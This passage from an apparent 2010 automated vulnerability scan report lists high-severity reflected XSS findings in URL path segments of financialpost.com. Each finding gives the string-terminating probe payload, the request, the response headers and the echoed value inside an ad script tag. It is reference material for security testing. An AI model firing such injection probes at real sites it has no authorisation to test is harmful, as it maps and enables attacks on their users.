This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/news16774'%3b529b04d3c55/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43236


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/news16774';529b04d3c55/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=news16774';529b04d3c55;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50388801?">
...[SNIP]...

1.153. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/portfolio/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1f9'%3b8cef738f732 was submitted in the REST URL parameter 1. This input was echoed as fd1f9';8cef738f732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /marketsfd1f9'%3b8cef738f732/portfolio/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36555


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/marketsfd1f9';8cef738f732/portfolio/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=marketsfd1f9';8cef738f732;kw=portfolio;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67194293?">
...[SNIP]...

1.154. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/portfolio/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b4b8'%3b7f13b8163b5 was submitted in the REST URL parameter 2. This input was echoed as 6b4b8';7f13b8163b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/portfolio6b4b8'%3b7f13b8163b5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/portfolio6b4b8';7f13b8163b5/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=portfolio6b4b8';7f13b8163b5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=65828211?">
...[SNIP]...

1.155. http://www.financialpost.com/markets/results/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/results/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 649ce'%3b4439dbc4f71 was submitted in the REST URL parameter 1. This input was echoed as 649ce';4439dbc4f71 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets649ce'%3b4439dbc4f71/results/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43332


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets649ce';4439dbc4f71/results/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets649ce';4439dbc4f71;kw=results;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79878026?">
...[SNIP]...

1.156. http://www.financialpost.com/markets/results/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/results/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71eb2'%3bf1a79b216fd was submitted in the REST URL parameter 2. This input was echoed as 71eb2';f1a79b216fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/results71eb2'%3bf1a79b216fd/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36478


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/results71eb2';f1a79b216fd/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=results71eb2';f1a79b216fd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=67421828?">
...[SNIP]...

1.157. http://www.financialpost.com/markets/results/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/results/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82fca'%3b5879819d15f was submitted in the REST URL parameter 3. This input was echoed as 82fca';5879819d15f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/results/82fca'%3b5879819d15f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43338


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/results/82fca';5879819d15f/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=results;kw=82fca';5879819d15f;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95347973?">
...[SNIP]...

1.158. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b104'%3bd58474cdcee was submitted in the REST URL parameter 1. This input was echoed as 3b104';d58474cdcee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets3b104'%3bd58474cdcee/watchlist/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43371


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets3b104';d58474cdcee/watchlist/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets3b104';d58474cdcee;kw=watchlist;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=21285991?">
...[SNIP]...

1.159. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c584d'%3b08f996d92a7 was submitted in the REST URL parameter 2. This input was echoed as c584d';08f996d92a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/watchlistc584d'%3b08f996d92a7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/watchlistc584d';08f996d92a7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=watchlistc584d';08f996d92a7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=81614395?">
...[SNIP]...

1.160. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31b1d'%3bb196f6b29d6 was submitted in the REST URL parameter 1. This input was echoed as 31b1d';b196f6b29d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets31b1d'%3bb196f6b29d6/watchlist/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43372


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets31b1d';b196f6b29d6/watchlist/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets31b1d';b196f6b29d6;kw=watchlist;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37324735?">
...[SNIP]...

1.161. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46f1'%3ba08a2ab8328 was submitted in the REST URL parameter 2. This input was echoed as a46f1';a08a2ab8328 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/watchlista46f1'%3ba08a2ab8328/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/watchlista46f1';a08a2ab8328/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=watchlista46f1';a08a2ab8328;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97147485?">
...[SNIP]...

1.162. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/watchlist/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2418'%3bce201111d5b was submitted in the REST URL parameter 3. This input was echoed as a2418';ce201111d5b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/watchlist/a2418'%3bce201111d5b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43380


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/watchlist/a2418';ce201111d5b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=watchlist;kw=a2418';ce201111d5b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79076285?">
...[SNIP]...

1.163. http://www.financialpost.com/most-popular/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /most-popular/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f208'%3b0c5a12752b was submitted in the REST URL parameter 1. This input was echoed as 7f208';0c5a12752b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /most-popular7f208'%3b0c5a12752b/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:16:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:16:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36386


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/most-popular7f208';0c5a12752b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=most-popular7f208';0c5a12752b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56980233?">
...[SNIP]...

1.164. http://www.financialpost.com/news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a535'%3b42bfa164203 was submitted in the REST URL parameter 1. This input was echoed as 8a535';42bfa164203 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news8a535'%3b42bfa164203/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36240


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news8a535';42bfa164203/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news8a535';42bfa164203;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=90856130?">
...[SNIP]...

1.165. http://www.financialpost.com/news/FP500/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/FP500/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c300'%3bc784a23242d was submitted in the REST URL parameter 1. This input was echoed as 3c300';c784a23242d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news3c300'%3bc784a23242d/FP500/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381


...[SNIP]...
